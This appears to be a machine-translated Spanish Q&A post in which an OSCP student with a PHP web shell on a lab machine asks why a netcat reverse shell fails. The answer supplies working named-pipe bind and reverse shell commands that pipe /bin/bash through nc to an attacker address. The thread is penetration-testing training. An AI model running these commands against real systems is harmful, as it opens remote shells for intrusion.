No se puede obtener un shell inverso [cerrado]

0

Estoy haciendo mi certificación OSCP. En una de las máquinas de laboratorio, me está costando mucho conseguir una cáscara inversa.

Escaneé la máquina y encontré el puerto 80 abierto. Enumeré aún más y encontré una RFI.
Subí un shell web php y funcionó, el comando se está ejecutando como usuario de apache. Luego enumeré más y encontré netcat en la máquina.

Ahora quiero tener un shell en mi caja de ataque. Intenté usar netcat como un shell de inversión / vinculación y no obtengo nada.

Probé diferentes puertos y nada está funcionando. Cuando escaneo con puertos nmap como 6666, 4444, 5555, todos se filtran.

¿Qué estoy haciendo mal?

    
pregunta Xozu 04.10.2016 - 10:45
fuente

1 respuesta

10

La mayoría de los ncs en el laboratorio de OffSec (como la mayoría de los ncs en las distribuciones de Linux populares) no admiten -e. Simplemente no existe.
La solución es redirigir la comunicación estándar / stdout a través de una canalización:

cd /tmp
mknod mypipe p
/bin/bash 0< /tmp/mypipe | nc -nlvp 4444 1> /tmp/mypipe

para un shell de enlace o

/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe

para un shell inverso. Aquí hay un artículo completo sobre esto.

Recientemente encontré otro nc en un sistema Ubuntu 10.04 en el que el oyente nc anterior no habría funcionado ya que nc no permitía -l yp simultáneamente. Entonces, antes de entrar en pánico porque el shell no funciona, primero debe intentar obtener la ayuda de nc o jugar con las distintas opciones (tiendo a especificar muchas banderas, tal vez debería apuntar lo menos posible).

    
respondido por el kaidentity 04.10.2016 - 11:45
fuente

Lea otras preguntas en las etiquetas